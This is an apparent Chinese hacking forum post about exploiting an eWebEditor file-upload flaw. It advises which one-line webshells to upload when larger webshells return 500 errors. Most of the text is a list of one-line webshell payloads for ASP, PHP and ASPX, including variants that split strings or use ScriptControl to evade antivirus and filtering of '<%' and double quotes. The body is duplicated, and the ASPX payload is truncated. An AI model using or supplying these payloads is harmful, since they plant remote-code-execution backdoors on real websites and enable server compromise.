應對eWebEditor漏洞上傳文件500錯誤的方法
來源:van
相信大家對eWeb並不陌生
大家在搞站的可否發現有的uploadfiles目錄裏面傳上去的大馬或小馬是500錯誤
***了這麼久,發現在此情況下,上傳一句話,可以連接!
eval的一句話有時候會失敗
execute的一句話基本上都是成功的!
By:van
附:(多種寫一句話的方法)
ASP一句話
1.<%eval request("YouPass")%>
2. <%executerequest("YouPass")%>
3. <%execute(request("YouPass"))%>
免殺大部分網站的一句話
4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>
免殺部分網站過略<%,%>的一句話
5.<script language=VBScript runat=server>execute request("YouPass")</script%gt;
免殺部分網站過略雙引號的一句話
6.<%eval request(YouPass(35))%>
php一句話
7.<?php eval($_POST[YouPass]);?>
aspx一句話
8.<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("
相信大家對eWeb並不陌生
大家在搞站的可否發現有的uploadfiles目錄裏面傳上去的大馬或小馬是500錯誤
***了這麼久,發現在此情況下,上傳一句話,可以連接!
eval的一句話有時候會失敗
execute的一句話基本上都是成功的!
By:van
附:(多種寫一句話的方法)
ASP一句話
1.<%eval request("YouPass")%>
2. <%executerequest("YouPass")%>
3. <%execute(request("YouPass"))%>
免殺大部分網站的一句話
4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1") ms.Language="VBScript" ms.AddObject "Response", Response ms.AddObject "request", request ms.ExecuteStatement("ev"&"al(request(""YouPass""))") %>
免殺部分網站過略<%,%>的一句話
5.<script language=VBScript runat=server>execute request("YouPass")</script%gt;
免殺部分網站過略雙引號的一句話
6.<%eval request(YouPass(35))%>
php一句話
7.<?php eval($_POST[YouPass]);?>
aspx一句話
8.<script language="C#" runat="server"> WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.